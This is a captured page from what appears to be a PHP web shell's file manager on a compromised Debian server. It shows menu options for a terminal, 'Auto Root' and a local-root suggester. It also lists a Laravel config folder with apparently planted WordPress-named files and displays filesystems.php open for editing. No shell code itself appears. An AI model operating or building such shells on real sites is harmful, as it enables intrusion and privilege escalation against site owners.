Linux vmi2545633.contaboserver.net 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64
Apache/2.4.62 (Debian)
Server IP : 127.0.0.1 & Your IP : 127.0.0.1
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
softmedya.net /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
.trash7206
[ DIR ]
drwxr-xr-x
2025-12-13 08:15
.htaccess
197
B
-r--r--r--
2025-12-13 08:58
app.php
4.17
KB
-rw-r--r--
2025-10-02 07:30
auth.php
3.93
KB
-rw-r--r--
2025-10-02 07:30
cache.php
3.4
KB
-rw-r--r--
2025-10-02 07:30
database.php
6.69
KB
-rw-r--r--
2025-10-02 07:30
filesystems.php
2.44
KB
-rw-r--r--
2025-10-02 07:30
logging.php
4.23
KB
-rw-r--r--
2025-10-02 07:30
mail.php
3.53
KB
-rw-r--r--
2025-10-02 07:30
queue.php
3.73
KB
-rw-r--r--
2025-10-02 07:30
services.php
1.01
KB
-rw-r--r--
2025-10-02 07:30
session.php
7.66
KB
-rw-r--r--
2025-10-02 07:30
wp-blog-header.php
2.74
KB
-rw-r--r--
2025-12-13 08:58
wp-cron.php
2.74
KB
-rw-r--r--
2025-12-13 08:58
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Default Filesystem Disk |-------------------------------------------------------------------------- | | Here you may specify the default filesystem disk that should be used | by the framework. The "local" disk, as well as a variety of cloud | based disks are available to your application for file storage. | */ 'default' => env('FILESYSTEM_DISK', 'local'), /* |-------------------------------------------------------------------------- | Filesystem Disks |-------------------------------------------------------------------------- | | Below you may configure as many filesystem disks as necessary, and you | may even configure multiple disks for the same driver. Examples for | most supported storage drivers are configured here for reference. | | Supported drivers: "local", "ftp", "sftp", "s3" | */ 'disks' => [ 'local' => [ 'driver' => 'local', 'root' => storage_path('app/private'), 'serve' => true, 'throw' => false, 'report' => false, ], 'public' => [ 'driver' => 'local', 'root' => storage_path('app/public'), 'url' => env('APP_URL').'/storage', 'visibility' => 'public', 'throw' => false, 'report' => false, ], 's3' => [ 'driver' => 's3', 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION'), 'bucket' => env('AWS_BUCKET'), 'url' => env('AWS_URL'), 'endpoint' => env('AWS_ENDPOINT'), 'use_path_style_endpoint' => env('AWS_USE_PATH_STYLE_ENDPOINT', false), 'throw' => false, 'report' => false, ], ], /* |-------------------------------------------------------------------------- | Symbolic Links |-------------------------------------------------------------------------- | | Here you may configure the symbolic links that will be created when the | `storage:link` Artisan command is executed. The array keys should be | the locations of the links and the values should be their targets. | */ 'links' => [ public_path('storage') => storage_path('app/public'), ], ];